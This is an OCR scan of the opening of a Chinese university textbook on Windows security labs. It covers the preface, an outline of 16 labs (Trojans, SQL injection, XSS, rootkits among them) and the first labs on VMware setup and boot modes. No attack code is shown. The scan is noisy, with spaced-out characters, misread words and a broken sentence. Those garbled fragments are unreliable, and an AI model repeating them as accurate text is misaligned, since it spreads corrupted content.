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内 容 简 介 


本 书 是 基于 Windows 系统 平台 编写 的 信息 安全 实践 教程 ,包括 16 个 实践 操作 ,分 为 初级 篇 和 高 级 篇 ， 
初级 篇 有 10 个 实践 ,包括 虚拟 机 配置 .操作 系统 启动 方式 、 命 令 提示 符 、 注 册 表 和 组 策略 ,文件 类 型 .进程 
与 模块 、Windows 账户 与 访问 控制 消息 钩子 和 DLL 注入 ,数据 安全 以 及 木马 实践 ; 高 级 篇 有 6 个 实践 , 包 
括 Windows 内 核 基 本 分 析 、SQL 注入 、 跨 站 脚本 攻击 ,PE 文件 格式 、Rootkit 技术 和 恶意 代码 取证 分 析 。 

本 书 内 容 丰 富 ,特色 鲜明 ,实用 操作 性 强 , 可 作为 非 计算 机 或 计算 机 相关 专业 本 科 生 的 信息 系统 安全 
实践 教材 ,也 可 作为 计算 机 用 户 的 参考 书 和 培训 教材 。 


本 书 封 面 贴 有 清华 大 学 出 版 社 防伪 标签 ,无 标签 者 不 得 销售 。 
版 权 所 有 ,侵权 必 究 。 侵 权 举报 电话 : 00078 130128 
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出 版 圆 明 


当前 ,重视 实验 与 实践 教育 是 各 国 高 等 教育 界 的 发 展 潮流 ,我 国 与 国外 教学 i 
工作 的 差距 也 主要 表现 在 实践 教学 环节 上 。 面 对 新 的 形式 和 新 的 挑战 ,完善 实 i 
验 与 实践 教育 体系 成 为 一 种 必然 。 为 了 培养 具有 高 质量 、 高 素质 、 高 实践 能 力 和 I 
高 创新 能 力 的 人 才 ，, 全 国 很 多 高 等 院 校 在 实验 与 实践 教学 方面 进行 了 大 力 改革 ， 
在 实验 与 实践 教学 内 容 、 教 学 方法 、 教 学 体系 、 实 验 室 建设 等 方面 积累 了 大 量 的 
宝贵 经 验 , 起 到 了 教学 示范 作用 。 

实验 与 实践 性 教学 与 理论 教学 是 相辅相成 的 ,具有 同等 重要 的 地 位 。 它 
是 在 开放 教育 的 基础 上 ,为 配合 理论 教学 .培养 学 生 分 析 问 题 和 解决 问题 的 能 
力 以 及 加 强 训练 学 生 专业 实践 能 力 而 设置 的 教学 环节 ; 对 于 完成 教学 计划 、 
落实 教学 大 纲 ,确保 教学 质量 ,培养 学 生 分 析 问 题 、 解 决 问题 的 能 力 和 实际 操 
作 技能 更 具有 特别 重要 的 意义 。 同 时 ,实践 教学 也 是 培养 应 用 型 人 才 的 重要 
途径 ,实践 教学 质量 的 好 坏 , 实 际 上 也 决定 了 应 用 型 人 才 培养 质量 的 高 低 。 因 
此 ,加 强 实践 教学 环节 ,提高 实践 教学 质量 ,对 培养 高 质量 的 应 用 型 人 才 至 关 
重要 。 

近年 来 ,教育 部 把 实验 与 实践 教学 作为 对 高 等 院 校 教学 工作 评估 的 关键 性 
指标 。2005 年 1 月 ,在 教育 部 下 发 的 (关于 进一步 加 强 高 等 学 校本 科教 学 工作 
的 若干 意见 》 中 明确 指出 :“ 高 等 学 校 要 强化 实践 育 人 的 意识 ,区 别 不 同学 科 对 
实践 教学 的 要 求 , 合 理 制定 实践 教学 方案 ,完善 实践 教学 体系 。 要 切实 加 强 实 
验 、 实 习 、 社 会 实践 ,毕业 设计 (论文 ) 等 实践 教学 环节 ,保障 各 环节 的 时 间 和 效 
果 , 不 得 降低 要 求 。”,“ 要 不 断 改革 实践 教学 内 容 ,改进 实践 教学 方法 ,通过 政策 
引导 ,吸引 高 水 平 教师 从 事实 践 环节 教学 工作 。 要 加 强 产 学 研 合 作 教育 ,充分 利 
用 国内 外 资源 ,不 断 拓展 校 际 之 间 、 校 企 之 间 、 高 校 与 科研 院 所 之 间 的 合作 ,加 强 
各 种 形式 的 实践 教学 基地 和 实验 室 建 设 。” 

为 了 配合 开展 实践 教学 及 适应 教学 改革 的 需要 ,我 们 在 全 国名 高 等 院 校 精 
心 挖掘 和 送 选 了 一 批 在 计算 机 实验 与 实践 教学 方面 具有 潜心 研究 并 取得 了 富有 
特色 、 值 得 推广 的 教学 成 果 的 作者 ,把 他 们 多 年 积累 的 教学 经 验 编写 成 教材 ,为 
开展 实践 教学 的 学 校 起 一 个 抛砖引玉 的 示范 作用 。 

为 了 保证 出 版 质量 ,本 套 教 材 中 的 每 本 书 都 经 过 编 委 会 委员 的 精心 筛选 和 
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严格 评审 ,坚持 宁 缺 姓 滥 的 原则 ,力争 把 每 本 书 都 做 成 精品 。 同 时 ,为 了 能 够 让 更 多 、 更 好 的 
实践 教学 成 果 应 用 于 社会 和 各 高 等 院 校 ,我 们 热切 期 望 在 这 方面 有 经 验 和 成 果 的 教师 能 够 
加 入 到 本 套 丛 书 的 编写 队伍 中 ,为 实践 教学 的 发 展 和 取得 成 效 做 出 贡献 ; 也 衷心 地 期 望 广 
大 读者 对 本 套 教 材 提出 宝贵 意见 ,以 便 我 们 更 好 地 为 读者 服务 。 


清华 大 学 出 版 社 
联系 人 : 索 梅 suom@tup. tsinghua. edu. cn 
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信息 世界 充满 安全 威胁 ,包括 系统 漏洞 .内 部 人 员 威 胁 、 黑 客 渗透 ,社会 工程 
以 及 来 自 于 恶意 程序 (例如 熊猫 烧香 、 灰 蚀 子 、USB 病毒 .网 页 挂 马 、 病 毒 和 蠕虫 
等 ) 的 威胁 ,同时 各 种 新 的 安全 威胁 层出不穷 .与日俱增 。 目 前 ,来 自 于 Internet 
的 信息 安全 威胁 已 经 越 来 越 严 重 , 入 侵 方式 更 加 多 样 化 ,并 且 给 用 户 带 来 了 非常 
严重 的 损失 ,包括 隐私 或 机 密 信息 泄露 .信息 丢失 或 被 破坏 导致 不 可 用 以 及 信息 
被 非 授权 修改 .删除 等 。 

随 着 计算 机 的 普及 与 Internet 技术 的 不 断 发 展 , 越 来 越 多 的 人 开始 利用 
Internet 来 查阅 资料 收发 电子 邮件 、 交 友 聊 天 、 游 戏 娱乐 等 ,计算 机 和 Internet 
已 经 开始 明显 地 改变 人 们 的 日 常生 活 和 学 习 方式 。 当 前 流行 的 几 个 操作 系统 有 
Windows, UNIX 和 MAC 等 ,但 学 生平 时 学 习 和 生活 中 使 用 更 多 的 还 是 
Windows 系统 ,而 大 多 数学 生 基本 停留 在 会 用 Windows 系统 的 层面 上 ,对 系统 
本 身 的 体系 结构 和 安全 机 制 通常 一 知 半 解 ,因此 在 开放 、 充 满 诱惑 但 又 极 不 安全 
的 网 络 环境 中 ,学 生 普遍 对 其 所 面临 的 信息 安全 威胁 认识 不 足 , 在 遇 到 信息 安全 
风险 时 无 法 正确 地 规避 风险 和 进行 有 效 防护 。 

目前 与 信息 安全 实验 相关 的 书籍 出 版 较 多 .其 中 不 乏 精 品 .但 理论 性 较 强 ， 
涉及 计算 机 科学 、 网 络 技术 、 通 信和 技术 、 密 码 技术 、 信 息 安全 技术 、 信 息 论 等 多 种 
学 科 , 对 于 非 计算 机 专业 甚至 计算 机 相关 专业 的 学 生来 说 过 于 深奥 ,以 致 难以 理 
解 和 掌握 , 达 不 到 信息 安全 通 识 教育 的 目标 。 

本 书 以 Windows 系统 为 实践 平台 ,实践 项 目的 选择 切合 非 计 算 机 专业 学 生 
的 知识 背景 ,实践 内 容 由 浅 入 深 、 由 易 到 难 ,比较 容易 操作 和 实现 , 旨 在 通过 实践 
提高 学 生 对 安全 威胁 的 甄别 能 力 和 防范 能 力 。 本 书 内 容 分 为 16 个 实践 项 目 , 每 
个 项 目 包 括 实 践 目的 、 实 践 环境 .名词 解释 、 预 备 知 识 、 实 践 操作 及 步骤 以 及 思考 
题 几 部 分 。 

实践 1 介绍 虚拟 机 的 安装 与 配置 ,实现 实践 环境 的 搭建 。 

实践 2 在 了 解 Windows 操作 系统 .系统 启动 选项 .计算 机 启动 过 程 的 基础 
上 ,完成 修改 系统 启动 .操作 系统 探查 .虚拟 桌面 .PE 启动 盘 等 实践 操作 。 

实践 3 掌握 Windows 常用 命令 以 及 环境 变量 的 设置 。 

实践 4 了 解 并 掌握 注册 表 和 组 策略 的 结构 、 原 理 以 及 修改 方法 ,通过 实践 理 
解 其 与 计算 机 安全 的 紧密 关系 。 
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实践 5 了 解 文件 格式 、 类 型 及 其 查看 方法 .通过 修改 文件 夹 选项 修改 文件 时 间 属 性 和 
图 标 、 修 改 文件 关联 等 实践 操作 理解 文件 夹 病毒 的 原理 和 机 制 。 

实践 6 了 解 Windows 操作 系统 中 进程 线程 .服务 以 及 模块 的 概念 ,掌握 利用 工具 查 
看 它们 的 方法 。 

实践 7 理解 Windows 操作 系统 中 安全 账户 和 访问 控制 的 重要 性 ,掌握 其 设置 方法 , 包 
括 建 立 和 删除 系统 隐藏 账户 、 使 用 Cacls 命令 ,修改 管理 员 账 户 和 创建 陷阱 账户 。 

实践 8 Y f Windows 的 消息 机 制 、 窗 口 和 DLL 注入 的 基本 原理 ,通过 窗口 句柄 及 其 消 
息 的 查看 、 窗 口 属性 的 修改 .DLL 注入 和 DLL 网 络 连 接 等 实践 加 强 理 解 。 

实践 9 了 解 加 密 技术 ,掌握 个 人 数据 保护 以 及 数据 加 密 、 安 全 删除 和 恢复 的 方法 。 实 
践 内 容 包 括 文件 命 令 隐 藏 、 流 文件 隐藏 及 其 检测 方法 、Word 文档 数字 证 书 的 保护 、 
TrueCrypt 软件 实现 文件 加 密 、EasyRecovery 软件 实现 文件 的 恢复 、Eraser 软件 实现 文件 
的 安全 擦 除 以 及 移动 设备 防 病毒 感染 等 。 

实践 10 了 解 木 马 的 工作 机 制 和 通信 模式 以 及 检测 方法 ,通过 "上 兴 木 马 ” 的 具体 安装 、 
操作 及 其 工作 机 制 的 分 析 , 使 读者 认识 木马 的 危害 性 和 原理 并 掌握 其 检测 方法 。 

实践 11 了 解 Windows 内 核 原 理 ,掌握 内 核 的 基本 分 析 方 法 。 实 践 内 容 包 括 蓝 屏 产生 
及 分 析 内核 结构 体 查看 .KiFastCallEntry 机 理 分 析 等 。 

实践 12 了 解 Web 应 用 表单 处 理 流程 ,理解 SQL 注入 漏洞 的 原理 。 实 践 内 容 包括 字符 
串 型 SQL 注入 ,数字 型 SQL 注入 和 SQL 注入 修改 数据 。 

实践 13 了 解 网 站 脚本 工作 原理 ,理解 跨 站 脚本 攻击 机 制 。 实 践 内 容 包括 存储 型 KSS, 
反射 型 XSS, XSS 钓鱼 和 跨 站 请 求 伪造 。 

实践 14 较 深 入 理解 EXE 和 DLL 文件 的 PE 格式 ,理解 可 执行 文件 加 载 原 理 及 线程 注 
入 的 原理 。 结 合 具体 的 程序 源 代 码 分 析 , 理 解 PE 文件 格式 ,实现 EXE 注入 线程 启动 和 
EXE 感染 的 实践 操作 。 

实践 15 理解 和 掌握 Rootkit 技术 的 原理 和 工作 机 制 ,了 解 Bootkit 技术 ,了 解 当 前 木马 
或 病毒 的 隐藏 机 理 ,以 及 杀毒 软件 的 防护 原理 。 实 践 内 容 包括 文件 和 进程 隐藏 、 
RootkitRevealer 的 使 用 。 

实践 16 理解 和 掌握 恶意 代码 取证 和 分 析 的 方法 ,通过 对 一 个 具体 软件 的 取证 分 析 ,使 
读者 了 解 计 算 机 取证 的 流程 和 方法 。 

本 书 由 孙 夫 雄 主 编 , 其 中 , 宋 玉 美 参与 实践 1 的 编写 , 余 梦 姗 参与 实践 3 和 实践 4 的 编 
写 , 吴 天 雄 参 与 实践 7 和 实践 9 的 编写 , 汪 可 参与 实践 12 和 实践 13 的 编写 ,本 书 校 验 由 汪 
可 和 余 梦 姗 完成 。 

本 书 可 作为 非 计 算 机 或 计算 机 相关 专业 本 科 生 的 信息 系统 安全 实践 教材 ,也 可 作为 计 
算 机 用 户 的 参考 书 和 培训 教材 。 书 中 涉及 的 工具 和 代码 皆 可 在 清华 大 学 出 版 社 网 站 
(www. tup. tsinghua. edu. cn) 上 找到 。 

由 于 作者 自身 水 平 有 限 , 本 书 难免 会 有 不 妥 与 疏漏 之 处 ,恳请 专家 和 读者 提出 宝贵 
意见 。 


编 者 
2015 年 1 月 
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虚拟 机 配置 


1. 实践 目的 


(1) 安装 并 使 用 虚拟 机 。 
(2) 熟练 地 在 虚拟 机 上 运行 软件 。 
(3) 实现 虚拟 机 的 网 络 连 接 。 


2. 实践 环境 


(1) j À Internet 的 计算 机 一 台 , 安 装 Windows XP 或 Windows 7 
等 操作 系统 。 

(2) 实践 工具 : VMware Workstation 安装 包 ; 操作 系统 ISO 安装 
文件 (纯净 安装 版 ) 。 


3. 名 词 解释 


(1) 虚拟 机 : 通过 软件 模拟 的 具有 完整 硬件 系统 功能 的 .运行 在 一 
个 完全 隔离 环境 中 的 完整 计算 机 系统 。 

(2) ISO 安装 文件 : 光盘 的 镜像 文件 ,刻录 软件 可 以 直接 把 ISO 文 
件 刻录 成 可 安装 的 系统 光盘 ,用 虚拟 光驱 加 载运 行 或 用 WinRAR 解压 缩 
FIF. ISO 文件 一 般 以 iso 为 扩展 名 ,其 文件 格式 为 ISO 9660。 


4. 预备 知识 


1) 原理 及 作用 

虚拟 机 应 用 软件 在 宿主 计算 机 的 真实 处 理 器 和 内 存 基 础 之 上 为 虚 
拟 机 提供 虚拟 硬件 仿真 ,这 些 仿真 的 硬件 能 够 完全 被 安装 在 虚拟 机 上 的 
操作 系统 认为 是 真实 的 硬件 。 也 就 是 说 ,从 操作 系统 的 运行 特性 来 看 ， 
虚拟 出 的 硬件 和 真实 的 硬件 没有 本 质 上 的 差别 。 

虚拟 机 的 作用 : 作为 个 人 用 户 ,可 以 通过 在 一 台 PC 上 安装 虚拟 机 ， 
实现 同时 运行 多 个 操作 系统 ,而 且 不 用 重新 启动 计算 机 ,只 需 单 击 鼠 标 
即 可 打开 新 的 操作 系统 或 是 在 操作 系统 之 间 进 行 切 换 。 总 体 来 说 ,使 用 
虚拟 机 可 以 有 以 下 一 些 典 型 用 途 。 
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(1) 质量 评估 。 

对 于 软件 企业 和 公司 而 言 ,由 于 不 同 的 操作 系统 版 本 和 大 量 的 配置 项 ,软件 产品 的 测试 
将 耗费 大 量 的 管理 费用 ,通过 使 用 虚拟 机 及 其 丰富 的 特性 ,可 以 降低 企业 采购 和 管理 硬件 的 
成 本 ,并 提高 工作 效率 。 

(2) 程序 开发 与 测试 。 

程序 员 可 以 利用 虚拟 机 的 优越 性 实现 跨 平台 开发 不 同 操作 系统 下 的 应 用 程序 ,不 需要 
重新 启动 计算 机 就 可 以 完成 整个 开发 阶段 的 试 运行 和 调试 (Program Debugging), 因 而 节 
约 大 量 的 开发 时 间 。 在 网 络 测试 方面 ,可 以 利用 虚拟 机 的 网 络 特性 ,利用 一 台 计 算 机 即 可 建 
立 完 整 的 ,封闭 性 的 网 络 , 既 不 需要 另外 配置 硬件 设备 又 保证 了 数据 安全 。 

(3) 操作 系统 研发 。 

开发 操作 系统 时 程序 员 遇 到 的 第 一 个 难题 是 操作 系统 需要 不 断 编 译 调试 ,如 何 才能 让 
被 编译 的 内 核 程序 在 一 个 系统 上 进行 测试 。 这 种 测试 以 往 很 难 在 编写 代码 的 同一 台 计 算 机 
上 进行 ,因为 不 断 重新 启动 计算 机 会 大 大 干扰 编写 的 进程 。 另 外 ,把 要 测试 的 内 核 代码 转移 
到 一 台 专 用 的 测试 机 上 需要 使 用 可 移动 磁盘 ,操作 麻烦 且 增 加 费用 。 此 时 使 用 虚拟 机 就 是 
最 佳 的 解决 方案 了 。 可 以 把 要 调试 的 内 核 程 序 作为 一 个 客户 操作 系统 ,编程 间隙 还 可 以 把 
调试 中 的 客户 操作 系统 放大 到 全 屏 。 

(4) 教育 培训 和 商务 演示 。 

IT 培训 或 是 自学 计算 机 技术 ,都 必然 涉及 多 个 操作 系统 和 多 种 类 型 的 软件 ,这 个 时 候 
使 用 虚拟 机 将 有 巨大 的 优越 性 。IT 销售 人 员 推 销 的 计算 机 软件 产品 经 常 可 以 跨越 多 个 操 
作 系 统 平台 ,有 不 同 的 版 本 ,使 用 虚拟 机 就 可 以 仅 携带 一 台 笔记 本 电脑 到 客户 那里 进行 推销 
和 演示 了 。 这 个 方法 同样 适用 于 技术 支持 和 维护 人 员 。 

(5) 服务 器 端 产品 。 

就 虚拟 机 技术 而 言 , 最 早 是 出 现在 大 型 机 上 的 ,已 经 有 几 十 年 的 历史 了 ,当时 比尔 ， 盖 
芯 和 他 的 朋友 保罗 ，。 艾 伦 开发 的 最 早 的 PC BASIC 语言 环境 ,就 是 在 大 型 机 上 模拟 出 完整 
的 以 Intel 4004 芯片 为 CPU 的 , 仅 有 4KB 内 存 的 最 原始 的 PC 而 调试 通过 的 。 

(6) 信息 安全 。 

虚拟 机 可 用 于 未 知 病毒 的 查 杀 ,主要 应 用 在 脱 壳 方面 ,由 于 许多 未 知 病毒 的 本 质 都 是 一 
样 的 ,只 是 把 原 病毒 加 了 一 个 壳 , 如 果 能 成 功 地 把 病毒 的 这 层 壳 脱 掉 , 就 很 容易 将 病毒 清除 
了 ,缺点 是 消耗 大 量 的 系统 资源 。 对 于 个 人 用 户 , 利 用 虚拟 机 运行 可 疑 的 软件 ,或 通过 虚拟 
机 上 网 冲浪 ,可 以 杜绝 病毒 感染 主机 ,即使 病毒 破坏 了 虚拟 机 系统 也 不 影响 主机 系统 和 数 
据 , 虚 拟 机 系统 的 恢复 也 很 容易 。 

目前 ,虚拟 机 服务 器 已 经 从 大 型 机 拓展 到 Intel 平台 ,作为 巩固 数据 中 心 的 方法 , 它 正 在 
掀起 一 股 空前 的 流行 趋势 。Intel 服务 器 虚拟 机 领域 主要 有 三 家 公司 在 竞争 ,包括 
VMware, MS VPC( 前 身 Connectix 被 MS 收购 ) 和 Swsoft, 都 提供 独特 的 解决 方案 。 

VMware Workstation( 中 文 名 * 威 蹇 工作 站 ”) 是 一 款 功 能 强大 的 桌面 虚拟 计算 机 软件 ， 
提供 用 户 可 在 单一 的 桌面 上 同时 运行 不 同 的 操作 系统 ,进行 开发 测试. 部署。 除了 对 整个 
计算 机 进行 虚拟 外 ,常见 的 虚拟 软件 有 虚拟 光驱 、 虚 拟 桌面 .虚拟 摄像 头 .虚拟 串 口 等 。 

2) 虚拟 机 网 络 模式 

VMware 虚拟 软件 的 网 络 适 配器 模式 有 以 下 3 种 。 


(1) 桥接 模式 。 

这 是 VMware 的 默认 选项 。 桥 接 模式 是 指 本 地 物理 网 卡 和 虚拟 网 卡通 过 VMnet0 虚 
拟 交换 机 进行 桥接 ,虚拟 交换 机 就 相当 于 一 台 现 实 网 络 中 的 交换 机 ,物理 网 卡 和 虚拟 网 卡 在 
网 络 中 处 于 同等 地 位 ,并 处 于 同一 个 网 段 , 即 虚拟 网 卡 的 IP 地 址 设置 为 与 物理 网 卡 同一 个 
网 段 ,IP 地 址 和 DNS 地址 设 为 自动 获取 即 可 。 

(2) NAT 模式 。 

NAT(Network Address Translation, 网 络 地 址 转换 ) 属 接 入 广域网 (WAN) 技 术 , 是 一 
种 将 私有 (保留 ) 地 址 转化 为 合法 IP 地 址 的 转换 技术 , 它 被 广泛 应 用 于 各 种 类 型 的 Internet 
接 人 方式 和 各 种 类 型 的 网 络 。NAT 不 仅 完美 地 解决 了 IP 地 址 不 足 的 问题 ,而 且 还 能 够 有 
效 地 避免 来 自 网 络 外 部 的 攻击 ,隐藏 并 保护 网 络 内 部 的 计算 机 。 

NAT 模式 中 ,让 虚拟 机 借助 NAT 功能 ,通过 宿主 机 所 在 的 网 络 来 访问 公 网 。NAT 模 
式 中 ,虚拟 机 的 网 卡 和 物理 网 卡 的 网 络 ,不 在 同一 个 网 络 ,虚拟 机 的 网 卡 是 在 WMware 提供 
的 一 个 虚拟 网 络 。 

NAT 模式 和 桥接 模式 的 比较 如 下 。 

D NAT 模式 和 桥接 模式 虚拟 机 都 可 以 上 外 网 。 

© 由 于 NAT 的 网 络 在 VMware 提供 的 一 个 虚拟 网 络 里 ,所 以 局 域 网 其 他 主机 是 无 法 
访问 虚拟 机 的 ,而 宿主 机 可 以 访问 虚拟 机 ,虚拟 机 可 以 访问 局 域 网 的 所 有 主机 ,因为 真实 的 
局 域 网 相对 于 NAT 的 虚拟 网 络 ,就 是 NAT 的 虚拟 网 络 的 外 网 。 

O 桥接 模式 下 ,多 个 虚拟 机 之 间 可 以 互相 访问 ; NAT 模式 下 ,多 个 虚拟 机 之 间 也 可 以 
相互 访问 。 

(3) 仅 主机 模式 。 

在 仅 主机 (Host-Only) 模 式 下 ,虚拟 网 络 是 一 个 全 封闭 的 网 络 , 它 唯一 能 够 访问 的 就 是 
主机 。Host-Only 网 络 和 NAT 网 络 很 相似 ,不 同 的 地 方 就 是 Host-Only 网 络 没 有 NAT 服 
务 ,所 以 虚拟 网 络 不 能 连接 到 Internet。 主 机 和 虚拟 机 之 间 的 通信 是 通过 VMware 
Network Adepter VMnet1 虚拟 网 卡 来 实现 的 。 

Host-Only 的 宗旨 就 是 建立 一 个 与 外 界 隔 绝 的 内 部 网 络 ,来 提高 内 网 的 安全 性 。 这 个 
功能 或 许 对 普通 用 户 来 说 没有 多 大 意义 ,但 大 型 服务 商会 常常 利用 这 个 功能 。 


5. 实践 操作 及 步骤 


下 载 操作 系统 ISO 安装 文件 和 虚拟 机 VMware 安装 包 ( 软 件 版 本 为 10. 0) ,首先 安装 
VMware, 然 后 用 VMware 10. 0 序列 号 进行 注册 。 双 击 桌面 VMware 图 标 打开 虚拟 机 软件 
主 界面 ,如 图 1-1 所 示 。 

图 1-1 显示 了 当前 已 安装 了 3 个 虚拟 操作 系统 , 即 Windows 7 .Ubuntu 和 Windows XP 
以 及 它们 的 文件 所 在 的 目录 。 在 Windows 7 选项 卡 中 显示 了 该 虚拟 系统 的 设备 信息 ,通过 
“编辑 虚拟 机 设置 ”可 以 修改 设备 参数 ,或 删除 、 添 加 设备 ,如 图 1-2 所 示 。 

安装 新 的 虚拟 操作 系统 步骤 如 下 。 

A) 选择 “文件 ”>“ 新 建 虚拟 机 ”, 弹 出 “新 建 虚拟 机 向 导 ” 对 话 框 ,如 图 1-3 所 示 。 单 击 
“典型 " 单 选 按钮 再 单 击 “ 下 一 步 ” 按 钮 。 选 择 如 图 1-3(b) 中 所 示 的 “ 稍 后 安装 操作 系统 ”后 
单 击 “ 下 一 步 ” 按 钮 。 
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图 1-3 安装 向 导 


(2) 在 图 1-4(a) 中 选择 客户 机 操作 系统 类 型 ,在 Microsoft Windows 里 选择 Windows 
7 系统 。 在 图 1-4(b) 中 设置 虚拟 机 名 称 以 及 虚拟 机 文件 的 安装 目录 ,注意 不 使 用 默认 的 安 
装 目录 。 
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图 1-4 选择 客户 机 操作 系统 类 型 并 命名 虚拟 机 


(3) 接 下 来 设置 虚拟 系统 的 磁盘 大 小 。 如 图 1-5 所 示 ,“ 将 虚拟 磁盘 存储 为 单个 文件 ” 
其 文件 大 小 可 能 有 数 十 GB 之 多 (依赖 于 系统 中 安装 软件 的 数量 和 大 小 ) ,而 “将 虚拟 磁盘 拆 
分 成 多 个 文件 "每 个 文件 大 小 上 限 只 有 2GB 左右 ,有 助 于 复制 。 图 1-6 中 显示 了 虚拟 系统 
配置 信息 。 可 以 单 击 “ 自 定义 硬件 ”按钮 修改 、 增 加 或 删除 硬件 ,如 图 1-2 所 示 。 

单 击 图 1-6 中 的 “完成 "按钮 后 则 回 到 主 界面 并 新 增 了 一 个 名 为 Windows 7 的 选项 卡 ， 


图 1-6 虚拟 系统 配置 信息 


如 图 1-7(a) 所 示 。 图 1-7(b) 显 示 了 存储 在 “F:\windows 7 目录 下 的 虚拟 磁盘 的 多 个 文件 ， 
由 于 还 没有 安装 实质 的 操作 系统 ,整个 文件 夹 大 小 为 9MB。 其 中 文件 Windows 7. vmx 包含 了 
修改 虚拟 机 的 配置 信息 ,如 : . encoding 二 "GBK" 表 示 中 文 编码 ,virtualHW. version = 
"10" 表 示 虚 拟 机 软件 版 本 ; 用 高 版 本 VMware 生成 的 虚拟 系统 文件 可 能 无 法 用 低 版 本 
VMware 打开 ,这 时 将 virtualH W. version 的 值 修改 为 对 应 的 版 本 值 即 可 。 

(4) 在 图 1-2 所 示 的 “虚拟 机 设置 ”对 话 框 中 , 单 击 *CD/DVD 驱动 器 ?设备 ,选择 “使 用 
ISO 映像 文件 ”, 如 图 1-8 所 示 。 

(5) 设置 BIOS 的 启动 次 序 。 单 击 “ 开 启 此 虚拟 机 ”后 虚拟 计算 机 启动 ,立刻 按 住 键盘 上 
的 F2 键 不 放 , 即 进入 BIOS 设置 界面 ,如 图 1-9 所 示 , 使 用 左右 方向 键 切换 到 Boot 选项 卡 ， 
用 上 下 方向 键 选择 CD-ROM Drive, 然 后 按 Shift 和 十 键 将 CD-ROM Drive 移 至 顶端 , 按 
F10 键 保存 退出 。 
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图 1-8 设置 CD/DVD 设 备 
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图 1-9 设置 BIOS 启动 次 序 
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(6) 虚拟 机 从 CD-ROM 启动 后 ,进入 Windows 安装 界面 ,如 图 1-10 所 示 。 
第 
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图 1-10 Windows 安装 向 导 


Windows 7 安装 结束 后 ,文件 夹 “F:\windows 7” 的 大 小 会 增 至 十 几 GB。 虚 拟 机 的 使 
用 和 真实 的 计算 机 一 样 ,安装 杀毒 软件 (如 360, ESET 等 ) 和 实 


LARA, 


6. 思考 题 


如 何 利用 虚拟 机 保护 个 人 信息 安全 ? 


操作 系统 启动 方式 


1. 实践 目的 
掌握 如 何 修改 系统 启动 方式 。 
2. 实践 环境 


A) ÆA Internet 的 计算 机 一 台 ,安装 Windows XP Windows 7 或 
Windows 8 等 操作 系统 。 

(2) RTH: EasyBCD 安装 软件 ,Desktops 安装 包 ,Nmap 安装 
包 ,U 大 师 安 装 包 。 


3. 名 词 解释 


(1) 操作 系统 : 操作 系统 (Operating System,OS) 是 一 组 控制 和 管理 计 
算 机 软 、 硬 件 资源 ,为 用 户 提供 便捷 使 用 计算 机 的 程序 的 集合 ,是 硬件 与 其 
他 软件 系统 的 接口 ,是 用 户 和 计算 机 之 间 进 行 “ 交 流 ” 的 界面 (窗口 ) 。 

(2) 安全 模式 : 系统 在 安全 前 提 下 的 运行 模式 , 它 会 将 所 有 非 系统 
启动 项 自动 禁止 ,并 释放 Windows 对 这 些 文件 的 本 地 控制 权 。 在 安全 
模式 下 用 户 可 以 轻松 地 修复 系统 的 一 些 错误 .起 到 事半功倍 的 效果 。 安 
全 模式 的 工作 原理 是 在 不 加 载 第 三 方 设备 驱动 程序 的 情况 下 启动 计算 
机 ,使 计算 机 运行 在 系统 最 小 模式 ,这 样 用 户 就 可 以 方便 地 检测 与 修复 
计算 机 系统 的 错误 。 

(3) 虚拟 桌面 : 为 Windows 视图 系统 创建 多 桌面 扩展 ,使 用 户 或 程 
序 可 以 多 个 桌面 上 相互 切换 可 视 化 的 应 用 ,与 Linux 图 形 界面 中 四 方 格 
切换 相似 。 

(4) PE 启动 盘 : PE 是 微软 开发 的 一 款 独立 运行 的 “精简 的 Windows” 
系统 ,可 用 光盘 或 U 盘 启 动 ,在 计算 机 出 现 问 题 时 ,可 以 修复 .备份 还 原 
系统 .备份 重要 资料 ,也 可 以 用 于 查 杀 Rootkit 病毒 以 及 计算 机 取证 等 。 


4. 预备 知识 


1) 操作 系统 
操作 系统 的 功能 包括 管理 计算 机 系统 的 硬件 、 软 件 及 数据 资源 , 控 
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制程 序 运 行 ,改善 人 机 界面 ,为 其 他 应 用 软件 提供 支持 等 ,使 计算 机 系统 所 有 资源 最 大 限度 
地 发 挥 作 用 ,提供 了 各 种 形式 的 用 户 界面 ,使 用 户 有 一 个 好 的 工作 环境 ,为 其 他 软件 的 开发 
提供 必要 的 服务 和 相应 的 接口 。 实 际 上 ,用户 是 不 用 接触 操作 系统 的 ,操作 系统 管理 着 计算 
机 硬件 资源 ,同时 按 着 应 用 程序 的 资源 请 求 , 为 其 分 配 资源 ,如 划分 CPU 时 间 ,内 存 空间 的 
开辟 ,调用 打印 机 等 。 操 作 系统 主要 包括 以 下 功能 。 

(1) 处 理 机 管理 。 在 多 任务 程序 环境 下 ,处 理 机 的 分 配 和 运行 是 以 进程 为 基本 单位 
的 进程 调度 .进程 控制 .进程 同步 ,进程 通信 。 操 作 系统 将 CPU 划分 为 很 小 的 时 间 片 , 采 
用 循环 轮作 方式 将 这 些 CPU 时 间 片 分 配给 排队 队列 中 等 待 处 理 的 每 个 程序 ,如 图 2-1 
所 示 。 
CPU 时 间 片 


1 程序 排队 队列 
[e] [e] [s] … [eM 


图 2-1 CPU 时 间 分 片 


(2) 存储 器 管理 。 主 要 任务 是 对 内 存 进 行 分 配 、 保 护 和 扩充 。 
G) 设备 管理 。 包 括 设备 分 配 、 设 备 传输 控制 和 设备 独立 性 。 系 统 设备 管理 界面 如 
图 2-2 所 示 。 


马 设 御 管 理 器 
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图 2-2 设备 管理 界面 


(4) 文件 管理 。 包 括 文件 存储 空间 管理 .目录 管理 ,文件 操作 管理 和 文件 保护 。 
操作 系统 按 应 用 领域 划分 主要 有 三 种 : 桌面 操作 系统 .服务 器 操作 系统 和 艇 人 式 操 作 


系统 。 缘 具有 以 下 特征 。 

O 并 发 性 : 可 以 同时 执行 多 个 程序 。 

@ 共享 性 : 多 个 并 发 执行 的 程序 可 以 共同 使 用 系统 的 资源 。 

© 虚拟 性 : 是 把 逻辑 部 件 和 物理 实体 有 机 结合 为 一 体 的 处 理 技术 。 通 过 虚拟 技术 ,可 
以 实现 虚拟 处 理 器 .虚拟 存储 器 .虚拟 设备 等 。 

@ 不 确定 性 : 由 于 系统 共享 资源 有 限 ,并 发 程序 的 执行 受到 一 定 的 制约 和 影响 。 

2) Windows 家 族 

Windows 是 Microsoft 开发 的 一 个 多 任务 的 OS, 它 采用 图 形 窗口 界面 ,使 用 户 对 计算 
机 的 各 种 复杂 操作 只 需 通过 单 击 鼠 标 即 可 轻松 地 实现 。 下 面 介 绍 现代 Windows 的 起 源 。 
Windows 2000( 以 前 称 为 Windows NT 5. 0) 作 为 内 核 第 二 代 的 第 一 个 版 本 ,对 Windows 后 
